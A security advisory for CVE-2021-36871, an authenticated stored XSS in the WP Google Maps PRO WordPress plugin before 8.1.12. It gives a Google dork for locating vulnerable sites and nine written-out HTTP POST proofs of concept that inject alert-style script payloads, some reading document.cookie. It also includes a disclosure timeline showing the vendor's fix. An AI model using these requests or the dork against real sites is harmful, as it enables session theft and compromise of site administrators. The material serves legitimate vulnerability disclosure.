WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS

2021.09.20
ru Visse (RU) ru
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[+] :: VULNERABILITY: WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS [+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps-pro/ [+] :: DATE: 2021-06-11 [+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ] [+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ] [+] :: SOFTWARE VERSION: < 8.1.12 [+] :: SOFTWARE LINK: https://www.wpgmaps.com/purchase-professional-version/ [+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N [+] :: CWE: CWE-79 [+] :: CVE: CVE-2021-36871 [i] == [ Info: ] An Authenticated Persistent XSS vulnerability was discovered in the WP Google Maps PRO Add-on Plugin through v8.1.12 for WordPress. Vulnerable parameter(s): &dataset_name, &title, &description, &link, &names[], &icons[], &attributes[] (x2), &wpgmaps_marker_category_name. [?] == [ Code: ] - [$] == [ Impact: ] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. [%] == [ Payloads: ] <script>alert(origin)</script> <script>alert(document.domain)</script> [!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Heatmaps > &dataset_name: ] POST /wp-json/wpgmza/v1/heatmaps/ HTTP/2 Host: blackcore.ru Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: f0f10b488b X-Requested-With: XMLHttpRequest Content-Length: 532 id=-1&map_id=1&dataset_name=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&gradient=%5B%22rgba(0%2C+0%2C+255%2C+0)%22%2C+%22rgba(0%2C+255%2C+255%2C+1)%22%2C+%22rgba(0%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+0%2C+0%2C+1)%22%5D&opacity=0.5&radius=20&dataset= [!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Markers > &title: ] POST /wp-json/wpgmza/v1/markers/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e7db87e0a9 X-Requested-With: XMLHttpRequest Content-Length: 1073 id=-1&map_id=1&title=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description= [!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Markers > &link: ] POST /wp-json/wpgmza/v1/markers/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e7db87e0a9 X-Requested-With: XMLHttpRequest Content-Length: 1073 id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description= [!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Markers > &description: ] POST /wp-json/wpgmza/v1/markers/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e7db87e0a9 X-Requested-With: XMLHttpRequest Content-Length: 1073 id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E [!] == [ PoC #5 | Authenticated Persistent XSS | Custom Fields > Name > &names[]: ] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 483 action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&icons%5B%5D=&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2 [!] == [ PoC #6 | Authenticated Persistent XSS | Custom Fields > Icon > &icons[]: ] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 483 action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2 [!] == [ PoC #7 | Authenticated Persistent XSS | Custom Fields > Attributes > Name > &attributes[]: ] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 483 action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2 [!] == [ PoC #8 | Authenticated Persistent XSS | Custom Fields > Attributes > Value > &attributes[]: ] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 483 action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2 [!] == [ PoC #9 | Authenticated Persistent XSS | Categories > Category Name > &wpgmaps_marker_category_name: ] POST /wp-admin/admin.php?page=wp-google-maps-menu-categories HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 281 real_post_nonce=337841e1c8&wpgmaps_marker_category_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&upload_default_category_marker=&category_image=&parent_category=0&wpgmaps_marker_category_priority=8&assigned_to_map%5B%5D=ALL&wpgmza_save_marker_category=Save+Category+%C2%BB [*] == [ Timeline: ] 2021.06.03 - WP Google Maps PRO Add-on Plugin v8.1.11 released 2021.06.11 - Multiple XSS issues discovered 2021.06.12 - Vendor contacted 2021.06.15 - WP Google Maps PRO Add-on Plugin v8.1.12 released [@] == [ Contacts: ] Website: visse.ru LinkedIn: @visse Medium: @visse HackerOne: @visse ==================================================================== = Want money for vulnerabilities in the WordPress ecosystem? [Y/n] = = ---------------------------------------------------------------- = = [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ = = [ No: ] Hunter, think twice and don't miss the chance to gain $ = ====================================================================

References:

https://www.youtube.com/channel/UCrquERXvK40ZqvqEwXM7JrA
https://www.linkedin.com/in/visse/
https://patchstack.com/red-team/


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top